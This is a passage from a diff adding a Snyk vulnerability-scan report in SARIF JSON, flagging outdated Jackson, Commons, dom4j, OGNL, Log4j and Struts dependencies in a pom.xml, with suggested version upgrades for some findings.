+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-core@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-core@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-collections:commons-collections package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-collections:commons-collections@3.1" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "level": "error", + "message": { + "text": "This file introduces a vulnerable commons-fileupload:commons-fileupload package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-fileupload:commons-fileupload@1.3.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.30" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.30" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-fileupload:commons-fileupload package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-fileupload:commons-fileupload@1.3.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.30" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.30" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-fileupload:commons-fileupload package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-fileupload:commons-fileupload@1.3.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@6.1.2" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@6.1.2" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSIO-1277109", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-io:commons-io package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-io:commons-io@2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@6.0.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@6.0.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-DOM4J-174153", + "level": "error", + "message": { + "text": "This file introduces a vulnerable dom4j:dom4j package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "dom4j:dom4j@1.6.1" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-DOM4J-2812975", + "level": "error", + "message": { + "text": "This file introduces a vulnerable dom4j:dom4j package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "dom4j:dom4j@1.6.1" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-JAVAXSERVLET-30449", + "level": "error", + "message": { + "text": "This file introduces a vulnerable javax.servlet:jstl package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "javax.servlet:jstl@1.2" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-OGNL-30474", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable ognl:ognl package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "ognl:ognl@3.0.6" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.7" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.12.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.12.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.7" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.12.4" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.12.4" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "level": "note", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a low severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.7" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.13.2" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.13.2" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.30" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.30" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.20.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.20.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." 
